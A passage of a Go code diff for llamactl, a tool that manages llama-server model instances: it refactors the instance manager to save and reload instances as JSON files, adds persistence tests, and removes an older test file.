"model": "/path/to/model1.gguf",
|
||||||
|
"port": 8080
|
||||||
|
}
|
||||||
|
}`
|
||||||
|
|
||||||
|
instance2JSON := `{
|
||||||
|
"name": "instance2",
|
||||||
|
"running": false,
|
||||||
|
"options": {
|
||||||
|
"model": "/path/to/model2.gguf",
|
||||||
|
"port": 8081
|
||||||
|
}
|
||||||
|
}`
|
||||||
|
|
||||||
|
// Write JSON files
|
||||||
|
err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create manager - should load instances from disk
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
// Verify instances were loaded
|
||||||
|
instances, err := manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(instances) != 2 {
|
||||||
|
t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check instances by name
|
||||||
|
instancesByName := make(map[string]*instance.Process)
|
||||||
|
for _, inst := range instances {
|
||||||
|
instancesByName[inst.Name] = inst
|
||||||
|
}
|
||||||
|
|
||||||
|
instance1, exists := instancesByName["instance1"]
|
||||||
|
if !exists {
|
||||||
|
t.Error("Expected instance1 to be loaded")
|
||||||
|
} else {
|
||||||
|
if instance1.GetOptions().Model != "/path/to/model1.gguf" {
|
||||||
|
t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
|
||||||
|
}
|
||||||
|
if instance1.GetOptions().Port != 8080 {
|
||||||
|
t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
instance2, exists := instancesByName["instance2"]
|
||||||
|
if !exists {
|
||||||
|
t.Error("Expected instance2 to be loaded")
|
||||||
|
} else {
|
||||||
|
if instance2.GetOptions().Model != "/path/to/model2.gguf" {
|
||||||
|
t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
|
||||||
|
}
|
||||||
|
if instance2.GetOptions().Port != 8081 {
|
||||||
|
t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
// Create JSON file with specific port
|
||||||
|
instanceJSON := `{
|
||||||
|
"name": "test-instance",
|
||||||
|
"running": false,
|
||||||
|
"options": {
|
||||||
|
"model": "/path/to/model.gguf",
|
||||||
|
"port": 8080
|
||||||
|
}
|
||||||
|
}`
|
||||||
|
|
||||||
|
err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create manager - should load instance and register port
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
// Try to create new instance with same port - should fail due to conflict
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model2.gguf",
|
||||||
|
Port: 8080, // Same port as loaded instance
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("new-instance", options)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for port conflict with loaded instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
|
||||||
|
t.Errorf("Expected port conflict error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
DefaultAutoRestart: true,
|
||||||
|
DefaultMaxRestarts: 3,
|
||||||
|
DefaultRestartDelay: 5,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create first manager and instance with comprehensive options
|
||||||
|
manager1 := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
autoRestart := false
|
||||||
|
maxRestarts := 10
|
||||||
|
restartDelay := 30
|
||||||
|
|
||||||
|
originalOptions := &instance.CreateInstanceOptions{
|
||||||
|
AutoRestart: &autoRestart,
|
||||||
|
MaxRestarts: &maxRestarts,
|
||||||
|
RestartDelay: &restartDelay,
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
Host: "localhost",
|
||||||
|
CtxSize: 4096,
|
||||||
|
GPULayers: 32,
|
||||||
|
Temperature: 0.7,
|
||||||
|
TopK: 40,
|
||||||
|
TopP: 0.9,
|
||||||
|
Verbose: true,
|
||||||
|
FlashAttn: false,
|
||||||
|
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||||
|
HFRepo: "microsoft/DialoGPT-medium",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create second manager (simulating restart) - should load the instance
|
||||||
|
manager2 := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
loadedInstance, err := manager2.GetInstance("roundtrip-test")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetInstance failed after reload: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compare all data
|
||||||
|
if loadedInstance.Name != originalInstance.Name {
|
||||||
|
t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
|
||||||
|
}
|
||||||
|
|
||||||
|
originalOpts := originalInstance.GetOptions()
|
||||||
|
loadedOpts := loadedInstance.GetOptions()
|
||||||
|
|
||||||
|
// Compare restart options
|
||||||
|
if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
|
||||||
|
t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
|
||||||
|
}
|
||||||
|
if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
|
||||||
|
t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
|
||||||
|
}
|
||||||
|
if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
|
||||||
|
t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compare llama server options
|
||||||
|
if loadedOpts.Model != originalOpts.Model {
|
||||||
|
t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
|
||||||
|
}
|
||||||
|
if loadedOpts.Port != originalOpts.Port {
|
||||||
|
t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
|
||||||
|
}
|
||||||
|
if loadedOpts.Host != originalOpts.Host {
|
||||||
|
t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
|
||||||
|
}
|
||||||
|
if loadedOpts.CtxSize != originalOpts.CtxSize {
|
||||||
|
t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
|
||||||
|
}
|
||||||
|
if loadedOpts.GPULayers != originalOpts.GPULayers {
|
||||||
|
t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
|
||||||
|
}
|
||||||
|
if loadedOpts.Temperature != originalOpts.Temperature {
|
||||||
|
t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
|
||||||
|
}
|
||||||
|
if loadedOpts.TopK != originalOpts.TopK {
|
||||||
|
t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
|
||||||
|
}
|
||||||
|
if loadedOpts.TopP != originalOpts.TopP {
|
||||||
|
t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
|
||||||
|
}
|
||||||
|
if loadedOpts.Verbose != originalOpts.Verbose {
|
||||||
|
t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
|
||||||
|
}
|
||||||
|
if loadedOpts.FlashAttn != originalOpts.FlashAttn {
|
||||||
|
t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
|
||||||
|
}
|
||||||
|
if loadedOpts.HFRepo != originalOpts.HFRepo {
|
||||||
|
t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compare slice fields
|
||||||
|
if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
|
||||||
|
t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify created timestamp is preserved
|
||||||
|
if loadedInstance.Created != originalInstance.Created {
|
||||||
|
t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Helper function to create a test manager with standard config
|
||||||
|
func createTestManager() manager.InstanceManager {
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
LogsDir: "/tmp/test",
|
||||||
|
MaxInstances: 10,
|
||||||
|
LlamaExecutable: "llama-server",
|
||||||
|
DefaultAutoRestart: true,
|
||||||
|
DefaultMaxRestarts: 3,
|
||||||
|
DefaultRestartDelay: 5,
|
||||||
|
}
|
||||||
|
return manager.NewInstanceManager(cfg)
|
||||||
|
}
|
||||||
@@ -1,54 +1,28 @@
|
|||||||
package llamactl
|
package manager
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
"sync"
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/validation"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
)
|
)
|
||||||
|
|
||||||
// InstanceManager defines the interface for managing instances of the llama server.
|
|
||||||
type InstanceManager interface {
|
|
||||||
ListInstances() ([]*Instance, error)
|
|
||||||
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
|
|
||||||
GetInstance(name string) (*Instance, error)
|
|
||||||
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
|
|
||||||
DeleteInstance(name string) error
|
|
||||||
StartInstance(name string) (*Instance, error)
|
|
||||||
StopInstance(name string) (*Instance, error)
|
|
||||||
RestartInstance(name string) (*Instance, error)
|
|
||||||
GetInstanceLogs(name string) (string, error)
|
|
||||||
}
|
|
||||||
|
|
||||||
type instanceManager struct {
|
|
||||||
mu sync.RWMutex
|
|
||||||
instances map[string]*Instance
|
|
||||||
ports map[int]bool
|
|
||||||
instancesConfig InstancesConfig
|
|
||||||
}
|
|
||||||
|
|
||||||
// NewInstanceManager creates a new instance of InstanceManager.
|
|
||||||
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
|
|
||||||
return &instanceManager{
|
|
||||||
instances: make(map[string]*Instance),
|
|
||||||
ports: make(map[int]bool),
|
|
||||||
instancesConfig: instancesConfig,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// ListInstances returns a list of all instances managed by the instance manager.
|
// ListInstances returns a list of all instances managed by the instance manager.
|
||||||
func (im *instanceManager) ListInstances() ([]*Instance, error) {
|
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
|
||||||
im.mu.RLock()
|
im.mu.RLock()
|
||||||
defer im.mu.RUnlock()
|
defer im.mu.RUnlock()
|
||||||
|
|
||||||
instances := make([]*Instance, 0, len(im.instances))
|
instances := make([]*instance.Process, 0, len(im.instances))
|
||||||
for _, instance := range im.instances {
|
for _, inst := range im.instances {
|
||||||
instances = append(instances, instance)
|
instances = append(instances, inst)
|
||||||
}
|
}
|
||||||
return instances, nil
|
return instances, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// CreateInstance creates a new instance with the given options and returns it.
|
// CreateInstance creates a new instance with the given options and returns it.
|
||||||
// The instance is initially in a "stopped" state.
|
// The instance is initially in a "stopped" state.
|
||||||
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||||
if options == nil {
|
if options == nil {
|
||||||
return nil, fmt.Errorf("instance options cannot be nil")
|
return nil, fmt.Errorf("instance options cannot be nil")
|
||||||
}
|
}
|
||||||
@@ -57,12 +31,12 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
|||||||
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
|
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
|
||||||
}
|
}
|
||||||
|
|
||||||
err := ValidateInstanceName(name)
|
name, err := validation.ValidateInstanceName(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
|
||||||
err = ValidateInstanceOptions(options)
|
err = validation.ValidateInstanceOptions(options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
@@ -90,15 +64,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
|||||||
im.ports[options.Port] = true
|
im.ports[options.Port] = true
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := NewInstance(name, &im.instancesConfig, options)
|
inst := instance.NewInstance(name, &im.instancesConfig, options)
|
||||||
im.instances[instance.Name] = instance
|
im.instances[inst.Name] = inst
|
||||||
im.ports[options.Port] = true
|
im.ports[options.Port] = true
|
||||||
|
|
||||||
return instance, nil
|
if err := im.persistInstance(inst); err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return inst, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// GetInstance retrieves an instance by its name.
|
// GetInstance retrieves an instance by its name.
|
||||||
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
|
||||||
im.mu.RLock()
|
im.mu.RLock()
|
||||||
defer im.mu.RUnlock()
|
defer im.mu.RUnlock()
|
||||||
|
|
||||||
@@ -111,7 +89,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
|||||||
|
|
||||||
// UpdateInstance updates the options of an existing instance and returns it.
|
// UpdateInstance updates the options of an existing instance and returns it.
|
||||||
// If the instance is running, it will be restarted to apply the new options.
|
// If the instance is running, it will be restarted to apply the new options.
|
||||||
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||||
im.mu.RLock()
|
im.mu.RLock()
|
||||||
instance, exists := im.instances[name]
|
instance, exists := im.instances[name]
|
||||||
im.mu.RUnlock()
|
im.mu.RUnlock()
|
||||||
@@ -124,7 +102,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
|||||||
return nil, fmt.Errorf("instance options cannot be nil")
|
return nil, fmt.Errorf("instance options cannot be nil")
|
||||||
}
|
}
|
||||||
|
|
||||||
err := ValidateInstanceOptions(options)
|
err := validation.ValidateInstanceOptions(options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
@@ -149,6 +127,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
im.mu.Lock()
|
||||||
|
defer im.mu.Unlock()
|
||||||
|
if err := im.persistInstance(instance); err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
|
||||||
|
}
|
||||||
|
|
||||||
return instance, nil
|
return instance, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -157,23 +141,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
|
|||||||
im.mu.Lock()
|
im.mu.Lock()
|
||||||
defer im.mu.Unlock()
|
defer im.mu.Unlock()
|
||||||
|
|
||||||
_, exists := im.instances[name]
|
instance, exists := im.instances[name]
|
||||||
if !exists {
|
if !exists {
|
||||||
return fmt.Errorf("instance with name %s not found", name)
|
return fmt.Errorf("instance with name %s not found", name)
|
||||||
}
|
}
|
||||||
|
|
||||||
if im.instances[name].Running {
|
if instance.Running {
|
||||||
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
|
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
|
||||||
}
|
}
|
||||||
|
|
||||||
delete(im.ports, im.instances[name].options.Port)
|
delete(im.ports, instance.GetOptions().Port)
|
||||||
delete(im.instances, name)
|
delete(im.instances, name)
|
||||||
|
|
||||||
|
// Delete the instance's config file if persistence is enabled
|
||||||
|
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||||
|
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
|
||||||
|
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
|
||||||
|
}
|
||||||
|
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// StartInstance starts a stopped instance and returns it.
|
// StartInstance starts a stopped instance and returns it.
|
||||||
// If the instance is already running, it returns an error.
|
// If the instance is already running, it returns an error.
|
||||||
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
|
||||||
im.mu.RLock()
|
im.mu.RLock()
|
||||||
instance, exists := im.instances[name]
|
instance, exists := im.instances[name]
|
||||||
im.mu.RUnlock()
|
im.mu.RUnlock()
|
||||||
@@ -189,11 +180,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
|||||||
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
|
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
im.mu.Lock()
|
||||||
|
defer im.mu.Unlock()
|
||||||
|
err := im.persistInstance(instance)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||||
|
}
|
||||||
|
|
||||||
return instance, nil
|
return instance, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// StopInstance stops a running instance and returns it.
|
// StopInstance stops a running instance and returns it.
|
||||||
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
|
||||||
im.mu.RLock()
|
im.mu.RLock()
|
||||||
instance, exists := im.instances[name]
|
instance, exists := im.instances[name]
|
||||||
im.mu.RUnlock()
|
im.mu.RUnlock()
|
||||||
@@ -209,11 +207,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
|||||||
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
|
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
im.mu.Lock()
|
||||||
|
defer im.mu.Unlock()
|
||||||
|
err := im.persistInstance(instance)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||||
|
}
|
||||||
|
|
||||||
return instance, nil
|
return instance, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// RestartInstance stops and then starts an instance, returning the updated instance.
|
// RestartInstance stops and then starts an instance, returning the updated instance.
|
||||||
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
|
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
|
||||||
instance, err := im.StopInstance(name)
|
instance, err := im.StopInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
@@ -234,16 +239,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
|
|||||||
// TODO: Implement actual log retrieval logic
|
// TODO: Implement actual log retrieval logic
|
||||||
return fmt.Sprintf("Logs for instance %s", name), nil
|
return fmt.Sprintf("Logs for instance %s", name), nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
|
||||||
portRange := im.instancesConfig.PortRange
|
|
||||||
|
|
||||||
for port := portRange[0]; port <= portRange[1]; port++ {
|
|
||||||
if !im.ports[port] {
|
|
||||||
im.ports[port] = true
|
|
||||||
return port, nil
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0, fmt.Errorf("no available ports in the specified range")
|
|
||||||
}
|
|
||||||
@@ -1,501 +0,0 @@
|
|||||||
package llamactl_test
|
|
||||||
|
|
||||||
import (
|
|
||||||
"strings"
|
|
||||||
"testing"
|
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
|
||||||
|
|
||||||
func TestNewInstanceManager(t *testing.T) {
|
|
||||||
config := llamactl.InstancesConfig{
|
|
||||||
PortRange: [2]int{8000, 9000},
|
|
||||||
LogDirectory: "/tmp/test",
|
|
||||||
MaxInstances: 5,
|
|
||||||
LlamaExecutable: "llama-server",
|
|
||||||
DefaultAutoRestart: true,
|
|
||||||
DefaultMaxRestarts: 3,
|
|
||||||
DefaultRestartDelay: 5,
|
|
||||||
}
|
|
||||||
|
|
||||||
manager := llamactl.NewInstanceManager(config)
|
|
||||||
if manager == nil {
|
|
||||||
t.Fatal("NewInstanceManager returned nil")
|
|
||||||
}
|
|
||||||
|
|
||||||
// Test initial state
|
|
||||||
instances, err := manager.ListInstances()
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("ListInstances failed: %v", err)
|
|
||||||
}
|
|
||||||
if len(instances) != 0 {
|
|
||||||
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_Success(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
Port: 8080,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
instance, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
if instance.Name != "test-instance" {
|
|
||||||
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
|
|
||||||
}
|
|
||||||
if instance.Running {
|
|
||||||
t.Error("New instance should not be running")
|
|
||||||
}
|
|
||||||
if instance.GetOptions().Port != 8080 {
|
|
||||||
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_DuplicateName(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create first instance
|
|
||||||
_, err := manager.CreateInstance("test-instance", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("First CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Try to create duplicate
|
|
||||||
_, err = manager.CreateInstance("test-instance", options2)
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error for duplicate instance name")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "already exists") {
|
|
||||||
t.Errorf("Expected duplicate name error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
|
||||||
// Create manager with low max instances limit
|
|
||||||
config := llamactl.InstancesConfig{
|
|
||||||
PortRange: [2]int{8000, 9000},
|
|
||||||
MaxInstances: 2, // Very low limit for testing
|
|
||||||
}
|
|
||||||
manager := llamactl.NewInstanceManager(config)
|
|
||||||
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options3 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create instances up to the limit
|
|
||||||
_, err := manager.CreateInstance("instance1", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err = manager.CreateInstance("instance2", options2)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// This should fail due to max instances limit
|
|
||||||
_, err = manager.CreateInstance("instance3", options3)
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error when exceeding max instances limit")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
|
||||||
t.Errorf("Expected max instances error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_PortAssignment(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
// Create instance without specifying port
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
instance, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Should auto-assign a port in the range
|
|
||||||
port := instance.GetOptions().Port
|
|
||||||
if port < 8000 || port > 9000 {
|
|
||||||
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
Port: 8080, // Explicit port
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model2.gguf",
|
|
||||||
Port: 8080, // Same port - should conflict
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create first instance
|
|
||||||
_, err := manager.CreateInstance("instance1", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Try to create second instance with same port
|
|
||||||
_, err = manager.CreateInstance("instance2", options2)
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error for port conflict")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
|
||||||
t.Errorf("Expected port conflict error, got: %v", err)
|
|
||||||
}
|
|
